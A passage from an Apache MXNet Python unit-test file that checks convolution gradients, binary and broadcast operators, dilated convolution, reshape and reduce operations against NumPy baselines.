exe1 = y1._simple_bind(dev, x=shape)
exe2 = y2._simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv._bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv._bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
d = gen_broadcast_data(idx);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
d = gen_binary_data(dummy);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol._bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
logging.error('input a hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol._bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
o = y.forward(is_train=True)
y.backward([mx.nd.array(out, dtype=o[0].dtype)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net._bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net._bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net._bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net._bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 3D
for dil in [ (1,1,1), (2,2,2), (3,3,3) ]:
for ks in [ (3,3,3), (4,4,4), (2,3,4), (3,2,4), (1,1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@pytest.mark.serial
@pytest.mark.parametrize('src_shape,shape_args,reverse,dst_shape', [
((2, 3, 5, 5), (0, -1), False, (2, 75)),
((2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)),
((5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)),
((2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)),
((2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)),
((2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)),
((2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)),
((2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)),
((2, 3, 5, 6), (-3, -3), False, (6, 30)),
((2, 3, 5, 6), (-3, -1), False, (6, 30)),
((64,), (-4, 16, 4), False, (16, 4)),
((64,), (-4, 16, -1), False, (16, 4)),
((64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)),
((2, 3, 5, 5), (0, -1), True, (5, 30)),
((2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)),
((5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)),
((2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)),
((2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)),
((2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)),
((2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)),
((2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)),
((2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)),
((2, 3, 5, 6), (-3, -3), True, (6, 30)),
((64,), (16, 4, -4), True, (16, 4)),
((64,), (16, -1, -4), True, (16, 4)),
((1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16))
])
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
def test_reshape_old():
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net._simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
# for test_case in test_cases:
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
